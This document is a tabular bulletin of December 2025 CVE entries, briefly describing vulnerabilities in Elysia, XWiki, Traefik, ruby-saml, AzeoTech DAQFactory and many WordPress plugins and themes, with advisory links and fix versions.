| elysiajs--elysia | Elysia is a Typescript framework for request validation, type inference, OpenAPI documentation and client-server communication. Versions 1.4.17 and below are subject to arbitrary code execution from cookie config. When dynamic cookies are enabled (e.g. there an existing cookie schema), the cookie config is injected into the compiled route without first being sanitised. Availability of this exploit is generally low, but when combined with GHSA-hxj9-33pp-j2cc, it allows for a full RCE chain. An attack requires write access to either the Elysia app's source code (in which case the vulnerability is meaningless) or write access to the cookie config (perhaps where it is assumed to be provisioned by the environment). This issue is fixed in version 1.4.18. | 2025-12-09 | not yet calculated | CVE-2025-66457 | https://github.com/elysiajs/elysia/security/advisories/GHSA-8vch-m3f4-q8jf https://github.com/elysiajs/elysia/security/advisories/GHSA-hxj9-33pp-j2cc https://github.com/elysiajs/elysia/pull/1564 https://github.com/elysiajs/elysia/commit/26935bf76ebc43b4a43d48b173fc853de43bb51e https://github.com/elysiajs/elysia/commit/3af978663e437dccc6c1a2a3aff4b74e1574849e |
| GS Yuasa International Ltd.--FULLBACK Manager Pro (for Windows) | FULLBACK Manager Pro provided by GS Yuasa International Ltd. registers two Windows services with unquoted file paths. A user may execute arbitrary code with SYSTEM privilege if he/she has the write permission on the path to the directory where the affected product is installed. | 2025-12-08 | not yet calculated | CVE-2025-66461 | https://ps.gs-yuasa.com/technicalinfo/pdf/failure/FMP_info20251201_TEX48214-993.pdf https://jvn.jp/en/jp/JVN59242986/ |
| xwiki--xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Versions 6.2-milestone-1 through 16.10.9 and 17.0.0-rc-1 through 17.4.1 of both XWiki Platform Flamingo Skin Resources and XWiki Platform Web Templates are vulnerable to a reflected XSS attack through a deletion confirmation message. The attacker-supplied script is executed when the victim clicks the "No" button. This issue is fixed in versions 16.10.10 and 17.4.2 of both XWiki Platform Flamingo Skin Resources and XWiki Platform Web Templates. | 2025-12-10 | not yet calculated | CVE-2025-66472 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7vpr-jm38-wr7w https://github.com/xwiki/xwiki-platform/commit/cb578b1b2910d06e9dd7581077072d1cfbd280f2 https://jira.xwiki.org/browse/XWIKI-23244 |
| xwiki--xwiki-platform | XWiki is an open-source wiki software platform. Versions 16.10.10 and below, 17.0.0-rc-1 through 17.4.3 and 17.5.0-rc-1 through 17.6.0 contain a REST API which doesn't enforce any limits for the number of items that can be requested in a single request at the moment. Depending on the number of pages in the wiki and the memory configuration, this can lead to slowness and unavailability of the wiki. As an example, the /rest/wikis/xwiki/spaces resource returns all spaces on the wiki by default, which are basically all pages. This issue is fixed in versions 17.4.4 and 16.10.11. | 2025-12-10 | not yet calculated | CVE-2025-66473 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-cc84-q3v3-mhgf https://github.com/xwiki/xwiki-platform/commit/e3c47745195fb445b054537be86f5c01ee69558b https://jira.xwiki.org/browse/XWIKI-23355 |
| xwiki--xwiki-rendering | XWiki Rendering is a generic rendering system that converts textual input in a given syntax (wiki syntax, HTML, etc) into another syntax (XHTML, etc). Versions 16.10.9 and below, 17.0.0-rc-1 through 17.4.2 and 17.5.0-rc-1 through 17.5.0 have insufficient protection against {{/html}} injection, which attackers can exploit through RCE. Any user who can edit their own profile or any other document can execute arbitrary script macros, including Groovy and Python macros, which enable remote code execution as well as unrestricted read and write access to all wiki contents. This issue is fixed in versions 16.10.10, 17.4.3 and 17.6.0-rc-1. | 2025-12-10 | not yet calculated | CVE-2025-66474 | https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-9xc6-c2rm-f27p https://github.com/xwiki/xwiki-platform/commit/12b780ccd5bca5fc8f74f46648d7e02fa04fbc11 https://github.com/xwiki/xwiki-rendering/commit/9b71a2ee035815cfc29cebbfe81dbdd98f941d49 https://jira.xwiki.org/browse/XRENDERING-693 https://jira.xwiki.org/browse/XRENDERING-792 https://jira.xwiki.org/browse/XRENDERING-793 https://jira.xwiki.org/browse/XWIKI-23378 |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. For versions prior to 2.11.32 and 2.11.31 through 3.6.2, requests using PathPrefix, Path or PathRegex matchers can bypass path normalization. When Traefik uses path-based routing, requests containing URL-encoded restricted characters (/, \, Null, ;, ?, #) can bypass the middleware chain and reach unintended backends. For example, a request to http://mydomain.example.com/admin%2F could reach service-a without triggering my-security-middleware, bypassing security controls for the /admin/ path. This issue is fixed in versions 2.11.32 and 3.6.3. | 2025-12-09 | not yet calculated | CVE-2025-66490 | https://github.com/traefik/traefik/security/advisories/GHSA-gm3x-23wp-hc2c https://github.com/traefik/traefik/releases/tag/v2.11.32 https://github.com/traefik/traefik/releases/tag/v3.6.4 |
| Elastic Email--Elastic Email Sender | Missing Authorization vulnerability in Elastic Email Elastic Email Sender elastic-email-sender allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Elastic Email Sender: from n/a through <= 1.2.20. | 2025-12-09 | not yet calculated | CVE-2025-66525 | https://vdp.patchstack.com/database/Wordpress/Plugin/elastic-email-sender/vulnerability/wordpress-elastic-email-sender-plugin-1-2-20-broken-access-control-vulnerability?_s_id=cve |
| Essekia--Tablesome | Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tablesome: from n/a through <= 1.1.34. | 2025-12-09 | not yet calculated | CVE-2025-66526 | https://vdp.patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-34-broken-access-control-vulnerability?_s_id=cve |
| VanKarWai--Lobo | Missing Authorization vulnerability in VanKarWai Lobo lobo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lobo: from n/a through <= 2.8.6. | 2025-12-09 | not yet calculated | CVE-2025-66527 | https://vdp.patchstack.com/database/Wordpress/Theme/lobo/vulnerability/wordpress-lobo-theme-2-8-6-broken-access-control-vulnerability?_s_id=cve |
| VillaTheme--Thank You Page Customizer for WooCommerce | Missing Authorization vulnerability in VillaTheme Thank You Page Customizer for WooCommerce woo-thank-you-page-customizer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Thank You Page Customizer for WooCommerce: from n/a through <= 1.1.8. | 2025-12-09 | not yet calculated | CVE-2025-66528 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-customizer/vulnerability/wordpress-thank-you-page-customizer-for-woocommerce-plugin-1-1-8-broken-access-control-vulnerability?_s_id=cve |
| Ays Pro--Chartify | Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Chartify chart-builder allows Cross Site Request Forgery. This issue affects Chartify: from n/a through <= 3.6.3. | 2025-12-09 | not yet calculated | CVE-2025-66529 | https://vdp.patchstack.com/database/Wordpress/Plugin/chart-builder/vulnerability/wordpress-chartify-plugin-3-6-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Webba Appointment Booking--Webba Booking | Missing Authorization vulnerability in Webba Appointment Booking Webba Booking webba-booking-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Webba Booking: from n/a through <= 6.2.1. | 2025-12-09 | not yet calculated | CVE-2025-66530 | https://vdp.patchstack.com/database/Wordpress/Plugin/webba-booking-lite/vulnerability/wordpress-webba-booking-plugin-6-2-1-broken-access-control-vulnerability?_s_id=cve |
| Dimitri Grassi--Salon booking system | Cross-Site Request Forgery (CSRF) vulnerability in Dimitri Grassi Salon booking system salon-booking-system allows Cross Site Request Forgery. This issue affects Salon booking system: from n/a through <= 10.30.3. | 2025-12-09 | not yet calculated | CVE-2025-66531 | https://vdp.patchstack.com/database/Wordpress/Plugin/salon-booking-system/vulnerability/wordpress-salon-booking-system-plugin-10-30-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Mikado-Themes--Powerlift | Missing Authorization vulnerability in Mikado-Themes Powerlift powerlift allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Powerlift: from n/a through < 3.2.1. | 2025-12-09 | not yet calculated | CVE-2025-66532 | https://vdp.patchstack.com/database/Wordpress/Theme/powerlift/vulnerability/wordpress-powerlift-theme-3-2-1-broken-access-control-vulnerability?_s_id=cve |
| StellarWP--GiveWP | Improper Control of Generation of Code ('Code Injection') vulnerability in StellarWP GiveWP give allows Code Injection. This issue affects GiveWP: from n/a through <= 4.13.1. | 2025-12-09 | not yet calculated | CVE-2025-66533 | https://vdp.patchstack.com/database/Wordpress/Plugin/give/vulnerability/wordpress-givewp-plugin-4-13-1-arbitrary-shortocde-execution-vulnerability?_s_id=cve |
| Elated-Themes--The Aisle | Missing Authorization vulnerability in Elated-Themes The Aisle theaisle allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Aisle: from n/a through <= 2.9. | 2025-12-09 | not yet calculated | CVE-2025-66534 | https://vdp.patchstack.com/database/Wordpress/Theme/theaisle/vulnerability/wordpress-the-aisle-theme-2-9-broken-access-control-vulnerability?_s_id=cve |
| gofiber--utils | Fiber Utils is a collection of common functions created for Fiber. In versions 2.0.0-rc.3 and below, when the system's cryptographic random number generator (crypto/rand) fails, both functions silently fall back to returning predictable UUID values, including the zero UUID "00000000-0000-0000-0000-000000000000". The vulnerability occurs through two related but distinct failure paths, both ultimately caused by crypto/rand.Read() failures, compromising the security of all Fiber applications using these functions for security-critical operations. This issue is fixed in version 2.0.0-rc.4. | 2025-12-09 | not yet calculated | CVE-2025-66565 | https://github.com/gofiber/utils/security/advisories/GHSA-m98w-cqp3-qcqr https://github.com/gofiber/utils/commit/6c6cf047032b9c8dff43d29f990b4b10e9b02d47 |
| SAML-Toolkits--ruby-saml | The ruby-saml library is for implementing the client side of a SAML authorization. ruby-saml versions up to and including 1.12.4 contain an authentication bypass vulnerability due to an incomplete fix for CVE-2025-25292. ReXML and Nokogiri parse XML differently, generating entirely different document structures from the same input. This allows an attacker to execute a Signature Wrapping attack. This issue is fixed in version 1.18.0. | 2025-12-09 | not yet calculated | CVE-2025-66567 | https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-9v8j-x534-2fx3 https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97 https://github.com/advisories/GHSA-754f-8gm6-c4r2 |
| SAML-Toolkits--ruby-saml | The ruby-saml library implements the client side of an SAML authorization. Versions up to and including 1.12.4, are vulnerable to authentication bypass through the libxml2 canonicalization process used by Nokogiri for document transformation, which allows an attacker to execute a Signature Wrapping attack. When libxml2's canonicalization is invoked on an invalid XML input, it may return an empty string rather than a canonicalized node. ruby-saml then proceeds to compute the DigestValue over this empty string, treating it as if canonicalization succeeded. This issue is fixed in version 1.18.0. | 2025-12-09 | not yet calculated | CVE-2025-66568 | https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-x4h9-gwv3-r4m4 https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), a Stack-Based Buffer Overflow vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process. | 2025-12-11 | not yet calculated | CVE-2025-66584 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), a Use After Free vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process. | 2025-12-11 | not yet calculated | CVE-2025-66585 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Resource Using Incompatible Type vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process. | 2025-12-11 | not yet calculated | CVE-2025-66586 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), the affected application is vulnerable to memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process. | 2025-12-11 | not yet calculated | CVE-2025-66587 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Uninitialized Pointer vulnerability can be exploited by an attacker which can lead to arbitrary code execution. | 2025-12-11 | not yet calculated | CVE-2025-66588 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), an Out-of-bounds Read vulnerability can be exploited by an attacker to cause the program to read data past the end of an allocated buffer. This could allow an attacker to disclose information or cause a system crash. | 2025-12-11 | not yet calculated | CVE-2025-66589 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| AzeoTech--DAQFactory | In AzeoTech DAQFactory release 20.7 (Build 2555), an Out-of-bounds Write vulnerability can be exploited by an attacker to cause the program to write data past the end of an allocated memory buffer. This can lead to arbitrary code execution or a system crash. | 2025-12-11 | not yet calculated | CVE-2025-66590 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 |
| matrix-org--matrix-rust-sdk | matrix-sdk-base is the base component to build a Matrix client library. Versions 0.14.1 and prior are unable to handle responses that include custom m.room.join_rules values due to a serialization bug. This can be exploited to cause a denial-of-service condition, if a user is invited to a room with non-standard join rules, the crate's sync process will stall, preventing further processing for all rooms. This is fixed in version 0.16.0. | 2025-12-09 | not yet calculated | CVE-2025-66622 | https://github.com/matrix-org/matrix-rust-sdk/security/advisories/GHSA-jj6p-3m75-g2p3 https://github.com/matrix-org/matrix-rust-sdk/pull/5924 https://github.com/matrix-org/matrix-rust-sdk/commit/4ea0418abefab2aa93f8851a4d39c723e703e6b0 https://rustsec.org/advisories/RUSTSEC-2025-0135.html |
| MarimerLLC--csla | CSLA .NET is a framework designed for the development of reusable, object-oriented business layers for applications. Versions 5.5.4 and below allow the use of WcfProxy. WcfProxy uses the now-obsolete NetDataContractSerializer (NDCS) and is vulnerable to remote code execution during deserialization. This vulnerability is fixed in version 6.0.0. To workaround this issue, remove the WcfProxy in data portal configurations. | 2025-12-09 | not yet calculated | CVE-2025-66631 | https://github.com/MarimerLLC/csla/security/advisories/GHSA-wq34-7f4g-953v https://github.com/MarimerLLC/csla/issues/4001 https://github.com/MarimerLLC/csla/pull/4018 |
| Apache Software Foundation--Apache Struts | Denial of Service vulnerability in Apache Struts, file leak in multipart request processing causes disk exhaustion. This issue affects Apache Struts: from 2.0.0 through 6.7.4, from 7.0.0 through 7.0.3. Users are recommended to upgrade to version 6.8.0 or 7.1.1, which fixes the issue. It's related to https://cve.org/CVERecord?id=CVE-2025-64775 - this CVE addresses missing affected version 6.7.4 | 2025-12-10 | not yet calculated | CVE-2025-66675 | https://cwiki.apache.org/confluence/display/WW/S2-068 https://cve.org/CVERecord?id=CVE-2025-64775 |
| n/a--edoc-doctor-appointment-system v1.0.1 | edoc-doctor-appointment-system v1.0.1 is vulnerable to Cross Site Scripting (XSS) in admin/add-session.php via the "title" parameter. | 2025-12-11 | not yet calculated | CVE-2025-66918 | https://github.com/HashenUdara/edoc-doctor-appointment-system https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66918/readme.md |
| n/a--jshERP versions 3.5 and earlier | jshERP versions 3.5 and earlier are affected by a stored XSS vulnerability. This vulnerability allows attackers to upload PDF files containing XSS payloads. Additionally, these PDF files can be accessed via static URLs, making them accessible to all users. | 2025-12-12 | not yet calculated | CVE-2025-67341 | https://github.com/jishenghua/jshERP/issues/139 |
| n/a--RuoYi versions 4.8.1 and earlier | RuoYi versions 4.8.1 and earlier is affected by a stored XSS vulnerability in the /system/menu/edit endpoint. While the endpoint is protected by an XSS filter, the protection can be bypassed. Additionally, because the menu is shared across all users, any user with menu modification permissions can impact all users by exploiting this stored XSS vulnerability. | 2025-12-12 | not yet calculated | CVE-2025-67342 | https://github.com/yangzongzhuan/RuoYi/issues/308 |
| n/a--jshERP v3.5 and earlier | jshERP v3.5 and earlier is affected by a stored Cross Site Scripting (XSS) vulnerability via the /msg/add endpoint. | 2025-12-12 | not yet calculated | CVE-2025-67344 | https://github.com/jishenghua/jshERP/issues/140 |
| QuantumCloud--Simple Link Directory | Cross-Site Request Forgery (CSRF) vulnerability in QuantumCloud Simple Link Directory simple-link-directory allows Cross Site Request Forgery. This issue affects Simple Link Directory: from n/a through <= 8.8.3. | 2025-12-09 | not yet calculated | CVE-2025-67465 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-link-directory/vulnerability/wordpress-simple-link-directory-plugin-8-8-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| sergiotrinity--Trinity Audio | Missing Authorization vulnerability in sergiotrinity Trinity Audio trinity-audio allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Trinity Audio: from n/a through <= 5.23.3. | 2025-12-09 | not yet calculated | CVE-2025-67466 | https://vdp.patchstack.com/database/Wordpress/Plugin/trinity-audio/vulnerability/wordpress-trinity-audio-plugin-5-23-3-broken-access-control-vulnerability?_s_id=cve |
| StellarWP--GiveWP | Cross-Site Request Forgery (CSRF) vulnerability in StellarWP GiveWP give allows Cross Site Request Forgery. This issue affects GiveWP: from n/a through <= 4.13.1. | 2025-12-09 | not yet calculated | CVE-2025-67467 | https://vdp.patchstack.com/database/Wordpress/Plugin/give/vulnerability/wordpress-givewp-plugin-4-13-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| CRM Perks--Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms | Missing Authorization vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms cf7-salesforce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms: from n/a through <= 1.4.6. | 2025-12-09 | not yet calculated | CVE-2025-67468 | https://vdp.patchstack.com/database/Wordpress/Plugin/cf7-salesforce/vulnerability/wordpress-integration-for-salesforce-and-contact-form-7-wpforms-elementor-formidable-ninja-forms-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve |
| kubiq--PDF Thumbnail Generator | Cross-Site Request Forgery (CSRF) vulnerability in kubiq PDF Thumbnail Generator pdf-thumbnail-generator allows Cross Site Request Forgery. This issue affects PDF Thumbnail Generator: from n/a through <= 1.4. | 2025-12-09 | not yet calculated | CVE-2025-67469 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-thumbnail-generator/vulnerability/wordpress-pdf-thumbnail-generator-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Essential Plugin--Portfolio and Projects | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Essential Plugin Portfolio and Projects portfolio-and-projects allows Retrieve Embedded Sensitive Data. This issue affects Portfolio and Projects: from n/a through <= 1.5.5. | 2025-12-09 | not yet calculated | CVE-2025-67470 | https://vdp.patchstack.com/database/Wordpress/Plugin/portfolio-and-projects/vulnerability/wordpress-portfolio-and-projects-plugin-1-5-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| Saad Iqbal--Quick Contact Form | Cross-Site Request Forgery (CSRF) vulnerability in Saad Iqbal Quick Contact Form quick-contact-form allows Cross Site Request Forgery. This issue affects Quick Contact Form: from n/a through <= 8.2.5. | 2025-12-09 | not yet calculated | CVE-2025-67471 | https://vdp.patchstack.com/database/Wordpress/Plugin/quick-contact-form/vulnerability/wordpress-quick-contact-form-plugin-8-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| vcita--Online Booking & Scheduling Calendar for WordPress by vcita | Cross-Site Request Forgery (CSRF) vulnerability in vcita Online Booking & Scheduling Calendar for WordPress by vcita meeting-scheduler-by-vcita allows Cross Site Request Forgery. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n/a through <= 4.5.5. | 2025-12-09 | not yet calculated | CVE-2025-67472 | https://vdp.patchstack.com/database/Wordpress/Plugin/meeting-scheduler-by-vcita/vulnerability/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| codeworkweb--CWW Companion | Cross-Site Request Forgery (CSRF) vulnerability in codeworkweb CWW Companion cww-companion allows Cross Site Request Forgery. This issue affects CWW Companion: from n/a through <= 1.3.2. | 2025-12-09 | not yet calculated | CVE-2025-67473 | https://vdp.patchstack.com/database/Wordpress/Plugin/cww-companion/vulnerability/wordpress-cww-companion-plugin-1-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Ultimate Member--ForumWP | Missing Authorization vulnerability in Ultimate Member ForumWP forumwp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ForumWP: from n/a through <= 2.1.4. | 2025-12-09 | not yet calculated | CVE-2025-67474 | https://vdp.patchstack.com/database/Wordpress/Plugin/forumwp/vulnerability/wordpress-forumwp-plugin-2-1-4-broken-access-control-vulnerability?_s_id=cve |
| static-web-server--static-web-server | Static Web Server (SWS) is a production-ready web server suitable for static web files or assets. Versions 2.40.0 and below contain symbolic links (symlinks) which can be used to access files or directories outside the intended web root folder. SWS generally does not prevent symlinks from escaping the web server's root directory. Therefore, if a malicious actor gains access to the web server's root directory, they could create symlinks to access other files outside the designated web root folder either by URL or via the directory listing. This issue is fixed in version 2.40.1. | 2025-12-09 | not yet calculated | CVE-2025-67487 | https://github.com/static-web-server/static-web-server/security/advisories/GHSA-459f-x8vq-xjjm https://github.com/static-web-server/static-web-server/commit/308f0d26ceb9c2c8bd219315d0f53914763357f2 |
| LabRedesCefetRJ--WeGIA | WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Versions 3.5.4 and below contain an SQL Injection vulnerability in the /html/matPat/editar_categoria.php endpoint. The application fails to properly validate and sanitize user inputs in the id_categoria parameter, which allows attackers to inject malicious SQL payloads for direct execution. This issue is fixed in version 3.5.5. | 2025-12-09 | not yet calculated | CVE-2025-67501 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-hj2x-qfm3-2869 https://github.com/LabRedesCefetRJ/WeGIA/commit/f04b91f584a38c2061a071b26219dba3f25819e6 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.5.5 |
| gardener--gardenctl-v2 | gardenctl is a command-line client for the Gardener which configures access to clusters and cloud provider CLI tools. When using non‑POSIX shells such as Fish and PowerShell, versions 2.11.0 and below of gardenctl allow an attacker with administrative privileges for a Gardener project to craft malicious credential values. The forged credential values are used in infrastructure Secret objects that break out of the intended string context when evaluated in Fish or PowerShell environments used by the Gardener service operators. This issue is fixed in version 2.12.0. | 2025-12-12 | not yet calculated | CVE-2025-67508 | https://github.com/gardener/gardenctl-v2/security/advisories/GHSA-fw33-qpx7-rhx2 |
| FreePBX--security-reporting | FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. Versions prior to 16.0.96 and 17.0.1 through 17.0.9 have a weak default password. By default, this is a 6 digit numeric value which can be brute forced. (This is the app_password parameter). Depending on local configuration, this password could be the extension, voicemail, user manager, DPMA or EPM phone admin password. This issue is fixed in versions 16.0.96 and 17.0.10. | 2025-12-10 | not yet calculated | CVE-2025-67513 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-426v-c5p7-cp29 |
| Mikado-Themes--Wilmr | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wilmër wilmer allows PHP Local File Inclusion. This issue affects Wilmër: from n/a through < 3.5. | 2025-12-09 | not yet calculated | CVE-2025-67515 | https://vdp.patchstack.com/database/Wordpress/Theme/wilmer/vulnerability/wordpress-wilmer-theme-3-5-local-file-inclusion-vulnerability?_s_id=cve |
| Agile Logix--Store Locator WordPress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Agile Logix Store Locator WordPress agile-store-locator allows Blind SQL Injection. This issue affects Store Locator WordPress: from n/a through <= 1.6.2. | 2025-12-09 | not yet calculated | CVE-2025-67516 | https://vdp.patchstack.com/database/Wordpress/Plugin/agile-store-locator/vulnerability/wordpress-store-locator-wordpress-plugin-1-6-2-sql-injection-vulnerability?_s_id=cve |
| artplacer--ArtPlacer Widget | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in artplacer ArtPlacer Widget artplacer-widget allows Blind SQL Injection. This issue affects ArtPlacer Widget: from n/a through <= 2.22.9.2. | 2025-12-09 | not yet calculated | CVE-2025-67517 | https://vdp.patchstack.com/database/Wordpress/Plugin/artplacer-widget/vulnerability/wordpress-artplacer-widget-plugin-2-22-9-2-sql-injection-vulnerability?_s_id=cve |
| LambertGroup--Accordion Slider PRO | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Accordion Slider PRO accordion_slider_pro allows Blind SQL Injection. This issue affects Accordion Slider PRO: from n/a through <= 1.2. | 2025-12-09 | not yet calculated | CVE-2025-67518 | https://vdp.patchstack.com/database/Wordpress/Plugin/accordion_slider_pro/vulnerability/wordpress-accordion-slider-pro-plugin-1-2-sql-injection-vulnerability?_s_id=cve |
| Shahjahan Jewel--Ninja Tables | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjahan Jewel Ninja Tables ninja-tables allows SQL Injection. This issue affects Ninja Tables: from n/a through <= 5.2.3. | 2025-12-09 | not yet calculated | CVE-2025-67519 | https://vdp.patchstack.com/database/Wordpress/Plugin/ninja-tables/vulnerability/wordpress-ninja-tables-plugin-5-2-3-sql-injection-vulnerability?_s_id=cve |
| Tiny Solutions--Media Library Tools | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tiny Solutions Media Library Tools media-library-tools allows SQL Injection. This issue affects Media Library Tools: from n/a through <= 1.6.15. | 2025-12-09 | not yet calculated | CVE-2025-67520 | https://vdp.patchstack.com/database/Wordpress/Plugin/media-library-tools/vulnerability/wordpress-media-library-tools-plugin-1-6-15-sql-injection-vulnerability?_s_id=cve |
| Select-Themes--Select Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Select Core select-core allows PHP Local File Inclusion. This issue affects Select Core: from n/a through < 2.6. | 2025-12-09 | not yet calculated | CVE-2025-67521 | https://vdp.patchstack.com/database/Wordpress/Plugin/select-core/vulnerability/wordpress-select-core-plugin-2-6-local-file-inclusion-vulnerability?_s_id=cve |
| NooTheme--Jobmonster | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NooTheme Jobmonster noo-jobmonster allows PHP Local File Inclusion. This issue affects Jobmonster: from n/a through <= 4.8.2. | 2025-12-09 | not yet calculated | CVE-2025-67522 | https://vdp.patchstack.com/database/Wordpress/Theme/noo-jobmonster/vulnerability/wordpress-jobmonster-theme-4-8-2-local-file-inclusion-vulnerability?_s_id=cve |
| trippleS--Exhibz | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Exhibz exhibz allows PHP Local File Inclusion. This issue affects Exhibz: from n/a through <= 3.0.9. | 2025-12-09 | not yet calculated | CVE-2025-67523 | https://vdp.patchstack.com/database/Wordpress/Theme/exhibz/vulnerability/wordpress-exhibz-theme-3-0-9-local-file-inclusion-vulnerability?_s_id=cve |
| NooTheme--Jobmonster Elementor Addon | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NooTheme Jobmonster Elementor Addon jobmonster-addon allows PHP Local File Inclusion. This issue affects Jobmonster Elementor Addon: from n/a through <= 1.1.4. | 2025-12-09 | not yet calculated | CVE-2025-67524 | https://vdp.patchstack.com/database/Wordpress/Plugin/jobmonster-addon/vulnerability/wordpress-jobmonster-elementor-addon-plugin-1-1-4-local-file-inclusion-vulnerability?_s_id=cve |
| Opal_WP--ekommart | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Opal_WP ekommart ekommart allows PHP Local File Inclusion. This issue affects ekommart: from n/a through < 4.3.1. | 2025-12-09 | not yet calculated | CVE-2025-67525 | https://vdp.patchstack.com/database/Wordpress/Theme/ekommart/vulnerability/wordpress-ekommart-theme-4-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| ThimPress--Sailing | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThimPress Sailing sailing allows PHP Local File Inclusion. This issue affects Sailing: from n/a through < 4.4.6. | 2025-12-09 | not yet calculated | CVE-2025-67526 | https://vdp.patchstack.com/database/Wordpress/Theme/sailing/vulnerability/wordpress-sailing-theme-4-4-6-local-file-inclusion-vulnerability?_s_id=cve |
| trippleS--Digiqole | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Digiqole digiqole allows PHP Local File Inclusion. This issue affects Digiqole: from n/a through < 2.2.7. | 2025-12-09 | not yet calculated | CVE-2025-67527 | https://vdp.patchstack.com/database/Wordpress/Theme/digiqole/vulnerability/wordpress-digiqole-theme-2-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Urna | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Urna urna allows PHP Local File Inclusion. This issue affects Urna: from n/a through <= 2.5.12. | 2025-12-09 | not yet calculated | CVE-2025-67528 | https://vdp.patchstack.com/database/Wordpress/Theme/urna/vulnerability/wordpress-urna-theme-2-5-12-local-file-inclusion-vulnerability?_s_id=cve |
